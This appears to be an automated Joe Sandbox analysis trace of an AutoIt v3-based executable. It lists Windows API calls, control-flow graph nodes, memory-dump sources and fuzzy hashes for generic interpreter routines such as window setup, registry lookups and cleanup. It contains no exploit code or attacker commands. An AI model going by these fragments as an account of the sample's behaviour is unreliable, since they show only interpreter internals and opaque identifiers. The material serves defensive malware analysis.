                                                                                                                                                                                                                                                                  • Part of subcall function 00673A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00741418,?,00672E7F,?,?,?,00000000), ref: 00673A78
                                                                                                                                                                                                                                                                  • Part of subcall function 00673357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00673379
                                                                                                                                                                                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0067356A
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006B318D
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006B31CE
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 006B3210
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006B3277
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006B3286
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                • Opcode ID: 0d1393f4f07cac32eae6e533448baa353dd04c9743919f9c7b1e73e59f169fea
                                                                                                                                                                                                                                                                • Instruction ID: fb31efc19cf1c46f90c08fdf9521502157992ecd0cfcdf9ce527894c4ae45ba8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d1393f4f07cac32eae6e533448baa353dd04c9743919f9c7b1e73e59f169fea
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F71D7B15043009EC354DF65DC428ABBBF9FF86740F80852EF545832B1EB389A59CB6A

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00672B8E
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00672B9D
                                                                                                                                                                                                                                                                • LoadIconW.USER32(00000063), ref: 00672BB3
                                                                                                                                                                                                                                                                • LoadIconW.USER32(000000A4), ref: 00672BC5
                                                                                                                                                                                                                                                                • LoadIconW.USER32(000000A2), ref: 00672BD7
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00672BEF
                                                                                                                                                                                                                                                                • RegisterClassExW.USER32(?), ref: 00672C40
                                                                                                                                                                                                                                                                  • Part of subcall function 00672CD4: GetSysColorBrush.USER32(0000000F), ref: 00672D07
                                                                                                                                                                                                                                                                  • Part of subcall function 00672CD4: RegisterClassExW.USER32(00000030), ref: 00672D31
                                                                                                                                                                                                                                                                  • Part of subcall function 00672CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00672D42
                                                                                                                                                                                                                                                                  • Part of subcall function 00672CD4: InitCommonControlsEx.COMCTL32(?), ref: 00672D5F
                                                                                                                                                                                                                                                                  • Part of subcall function 00672CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00672D6F
                                                                                                                                                                                                                                                                  • Part of subcall function 00672CD4: LoadIconW.USER32(000000A9), ref: 00672D85
                                                                                                                                                                                                                                                                  • Part of subcall function 00672CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00672D94
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                • Opcode ID: eeed44c612e88440173b995acd4f1735804f1dcc1048018ef4743ea3e574ca23
                                                                                                                                                                                                                                                                • Instruction ID: 7df356b97d1aa7d96706c668f4a41f56febc562ea5a471db30068d855e4ba59f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eeed44c612e88440173b995acd4f1735804f1dcc1048018ef4743ea3e574ca23
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E214C78E40314ABDB11AFA5EC55A997FB4FB09B50F40C11BF500A66A0D7B90580CF98
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0067BB4E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                • String ID: p#t$p#t$p#t$p#t$p%t$p%t$x#t$x#t
                                                                                                                                                                                                                                                                • API String ID: 1385522511-3434696796
                                                                                                                                                                                                                                                                • Opcode ID: c9aa44c368586918cc171dfbc68edbd8ba61f09f8717b5b3c895d30c73295076
                                                                                                                                                                                                                                                                • Instruction ID: f338dab1bd5f955339947418ed250103337b29eba5e4daf0dca9c62d22a67341
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9aa44c368586918cc171dfbc68edbd8ba61f09f8717b5b3c895d30c73295076
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72329B34A00209DFEB14DF54C894FBAB7BAEF45304F14C05AE919AB352D778AE42CB95

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 805 673170-673185 806 673187-67318a 805->806 807 6731e5-6731e7 805->807 809 67318c-673193 806->809 810 6731eb 806->810 807->806 808 6731e9 807->808 811 6731d0-6731d8 DefWindowProcW 808->811 814 673265-67326d PostQuitMessage 809->814 815 673199-67319e 809->815 812 6b2dfb-6b2e23 call 6718e2 call 68e499 810->812 813 6731f1-6731f6 810->813 822 6731de-6731e4 811->822 851 6b2e28-6b2e2f 812->851 817 67321d-673244 SetTimer RegisterWindowMessageW 813->817 818 6731f8-6731fb 813->818 816 673219-67321b 814->816 820 6731a4-6731a8 815->820 821 6b2e7c-6b2e90 call 6dbf30 815->821 816->822 817->816 826 673246-673251 CreatePopupMenu 817->826 823 673201-67320f KillTimer call 6730f2 818->823 824 6b2d9c-6b2d9f 818->824 827 6b2e68-6b2e72 call 6dc161 820->827 828 6731ae-6731b3 820->828 821->816 846 6b2e96 821->846 841 673214 call 673c50 823->841 830 6b2da1-6b2da5 824->830 831 6b2dd7-6b2df6 MoveWindow 824->831 826->816 842 6b2e77 827->842 835 6b2e4d-6b2e54 828->835 836 6731b9-6731be 828->836 838 6b2da7-6b2daa 830->838 839 6b2dc6-6b2dd2 SetFocus 830->839 831->816 835->811 840 6b2e5a-6b2e63 call 6d0ad7 835->840 844 6731c4-6731ca 836->844 845 673253-673263 call 67326f 836->845 838->844 847 6b2db0-6b2dc1 call 6718e2 838->847 839->816 840->811 841->816 842->816 844->811 844->851 845->816 846->811 847->816 851->811 855 6b2e35-6b2e48 call 6730f2 call 673837 851->855 855->811
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0067316A,?,?), ref: 006731D8
                                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000001,?,?,?,?,?,0067316A,?,?), ref: 00673204
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00673227
                                                                                                                                                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0067316A,?,?), ref: 00673232
                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00673246
                                                                                                                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00673267
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                • Opcode ID: f9cd330203db420aaff7e4a79456c91ea2f557f63b3c5cd320f12b6acd398f8e
                                                                                                                                                                                                                                                                • Instruction ID: 8ebb1e45721b707ecfeead1796deda140d09d3abc90b2ddb02a357ca9d79e904
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9cd330203db420aaff7e4a79456c91ea2f557f63b3c5cd320f12b6acd398f8e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82416D35250224E7DB152B388C197F9375BE706340F94C22AF519853A2CB799B81A76A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: D%t$D%t$D%t$D%t$D%tD%t$Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                • API String ID: 0-3475053870
                                                                                                                                                                                                                                                                • Opcode ID: 1bbae59d9d5eec0a24238054effeec3c7c98ef864ffe4577c1416d163200410c
                                                                                                                                                                                                                                                                • Instruction ID: caa8cf3de5ae5550bffa20c7e22428306027b99801246a551968ac73858e262f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bbae59d9d5eec0a24238054effeec3c7c98ef864ffe4577c1416d163200410c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15C28D75A00214CFCB24DF58C881AADB7B2FF09310F24C5A9E919AB391D376ED46CB95
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0067FE66
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                • String ID: D%t$D%t$D%t$D%t$D%tD%t
                                                                                                                                                                                                                                                                • API String ID: 1385522511-302452260
                                                                                                                                                                                                                                                                • Opcode ID: 2f710cc086279f089aa38d1fc5a5120d10bdc2679702d7a96b9cf034074bc7d5
                                                                                                                                                                                                                                                                • Instruction ID: f97b4b6ef2b7579eaba2c8c3d0a74375a72c68d2427c2da9615f823c35d6a262
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f710cc086279f089aa38d1fc5a5120d10bdc2679702d7a96b9cf034074bc7d5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12B29B74608340CFDB64CF18C490A6AB7E2BF99310F24896DF8998B352D775ED46CB92

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1814 671410-671449 1815 6b24b8-6b24b9 DestroyWindow 1814->1815 1816 67144f-671465 mciSendStringW 1814->1816 1819 6b24c4-6b24d1 1815->1819 1817 6716c6-6716d3 1816->1817 1818 67146b-671473 1816->1818 1821 6716d5-6716f0 UnregisterHotKey 1817->1821 1822 6716f8-6716ff 1817->1822 1818->1819 1820 671479-671488 call 67182e 1818->1820 1823 6b24d3-6b24d6 1819->1823 1824 6b2500-6b2507 1819->1824 1835 6b250e-6b251a 1820->1835 1836 67148e-671496 1820->1836 1821->1822 1826 6716f2-6716f3 call 6710d0 1821->1826 1822->1818 1827 671705 1822->1827 1828 6b24d8-6b24e0 call 676246 1823->1828 1829 6b24e2-6b24e5 FindClose 1823->1829 1824->1819 1832 6b2509 1824->1832 1826->1822 1827->1817 1834 6b24eb-6b24f8 1828->1834 1829->1834 1832->1835 1834->1824 1838 6b24fa-6b24fb call 6e32b1 1834->1838 1841 6b251c-6b251e FreeLibrary 1835->1841 1842 6b2524-6b252b 1835->1842 1839 6b2532-6b253f 1836->1839 1840 67149c-6714c1 call 67cfa0 1836->1840 1838->1824 1844 6b2541-6b255e VirtualFree 1839->1844 1845 6b2566-6b256d 1839->1845 1852 6714c3 1840->1852 1853 6714f8-671503 CoUninitialize 1840->1853 1841->1842 1842->1835 1843 6b252d 1842->1843 1843->1839 1844->1845 1848 6b2560-6b2561 call 6e3317 1844->1848 1845->1839 1849 6b256f 1845->1849 1848->1845 1855 6b2574-6b2578 1849->1855 1856 6714c6-6714f6 call 671a05 call 6719ae 1852->1856 1854 671509-67150e 1853->1854 1853->1855 1857 6b2589-6b2596 call 6e32eb 1854->1857 1858 671514-67151e 1854->1858 1855->1854 1859 6b257e-6b2584 1855->1859 1856->1853 1870 6b2598 1857->1870 1861 671707-671714 call 68f80e 1858->1861 1862 671524-67152f call 67988f 1858->1862 1859->1854 1861->1862 1875 67171a 1861->1875 1874 671535 call 671944 1862->1874 1876 6b259d-6b25bf call 68fdcd 1870->1876 1877 67153a-6715a5 call 6717d5 call 68fe14 call 67177c call 67988f call 67cfa0 call 6717fe call 68fe14 1874->1877 1875->1861 1882 6b25c1 1876->1882 1877->1876 1904 6715ab-6715cf call 68fe14 1877->1904 1885 6b25c6-6b25e8 call 68fdcd 1882->1885 1892 6b25ea 1885->1892 1895 6b25ef-6b2611 call 68fdcd 1892->1895 1901 6b2613 1895->1901 1903 6b2618-6b2625 call 6d64d4 1901->1903 1909 6b2627 1903->1909 1904->1885 1910 6715d5-6715f9 call 68fe14 1904->1910 1912 6b262c-6b2639 call 68ac64 1909->1912 1910->1895 1915 6715ff-671619 call 68fe14 1910->1915 1918 6b263b 1912->1918 1915->1903 1920 67161f-671643 call 6717d5 call 68fe14 1915->1920 1922 6b2640-6b264d call 6e3245 1918->1922 1920->1912 1929 671649-671651 1920->1929 1928 6b264f 1922->1928 1930 6b2654-6b2661 call 6e32cc 1928->1930 1929->1922 1931 671657-671668 call 67988f call 67190a 1929->1931 1936 6b2663 1930->1936 1938 67166d-671675 1931->1938 1939 6b2668-6b2675 call 6e32cc 1936->1939 1938->1930 1940 67167b-671689 1938->1940 1945 6b2677 1939->1945 1940->1939 1942 67168f-6716c5 call 67988f * 3 call 671876 1940->1942 1945->1945
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00671459
                                                                                                                                                                                                                                                                • CoUninitialize.COMBASE ref: 006714F8
                                                                                                                                                                                                                                                                • UnregisterHotKey.USER32(?), ref: 006716DD
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 006B24B9
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 006B251E
                                                                                                                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006B254B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                • String ID: close all
                                                                                                                                                                                                                                                                • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                • Opcode ID: 0d3170ce7fe822b84745a1cfbebbc0f0201e068d48c8e9323b89eeba49b4ab9a
                                                                                                                                                                                                                                                                • Instruction ID: 927b685f9bbf8cfe650c89af0845d1b7cbd8d0ad1a0f7164b3d11022540d3d52
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d3170ce7fe822b84745a1cfbebbc0f0201e068d48c8e9323b89eeba49b4ab9a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62D18E71701212CFDB29EF18C4A9AA9F7E2BF05700F1482AEE54A6B351DB30AD52CF55

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1953 6dde27-6dde4a WSAStartup 1954 6ddee6-6ddef2 call 694983 1953->1954 1955 6dde50-6dde71 gethostname gethostbyname 1953->1955 1963 6ddef3-6ddef6 1954->1963 1955->1954 1956 6dde73-6dde7a 1955->1956 1958 6dde7c-6dde81 1956->1958 1959 6dde83-6dde85 1956->1959 1958->1958 1958->1959 1961 6dde87-6dde94 call 694983 1959->1961 1962 6dde96-6ddedb call 690e20 inet_ntoa call 69d5f0 call 6debd1 call 694983 call 68fe14 1959->1962 1969 6ddede-6ddee4 WSACleanup 1961->1969 1962->1969 1969->1963
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                • Opcode ID: 74ba4c85cd9a7eecc83a8bc081dd2d141f6e497b88a4b42432033d7807a2cb9f
                                                                                                                                                                                                                                                                • Instruction ID: 0c3aa70b762fc6c38f43c21fab94aa46a1ab6fbb5100208900ccf749663aa930
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74ba4c85cd9a7eecc83a8bc081dd2d141f6e497b88a4b42432033d7807a2cb9f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0711E471904104BBDB61BB64DC0AEEE77AEDB50711F00426AF4059A291EF758A828B64

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1987 672c63-672cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00672C91
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00672CB2
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00671CAD,?), ref: 00672CC6
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00671CAD,?), ref: 00672CCF
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                • Opcode ID: 3138124e542219b13b619dcd6c4875a3a3be8c39cfb9a55edc4fb84ea656af7d
                                                                                                                                                                                                                                                                • Instruction ID: 74c89562dc90a907d3f6e7499ff68f5e0b45982fb14a1c6e3ddba9608e105052
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3138124e542219b13b619dcd6c4875a3a3be8c39cfb9a55edc4fb84ea656af7d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09F0DA79540290BAEB322B17AC48E772EBDD7C7F50B41815AF900A25A0C7691894DAB8

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 2102 6cd3a0-6cd3a9 2103 6cd3ab-6cd3b7 LoadLibraryA 2102->2103 2104 6cd376-6cd37b 2102->2104 2108 6cd3c9 2103->2108 2109 6cd3b9-6cd3c7 GetProcAddress 2103->2109 2105 6cd292-6cd2a8 2104->2105 2111 6cd2a9 2105->2111 2110 6cd3ce-6cd3de 2108->2110 2109->2108 2109->2110 2110->2105 2113 6cd3e4-6cd3eb FreeLibrary 2110->2113 2111->2111 2113->2105
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 006CD3AD
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 006CD3BF
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 006CD3E5
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
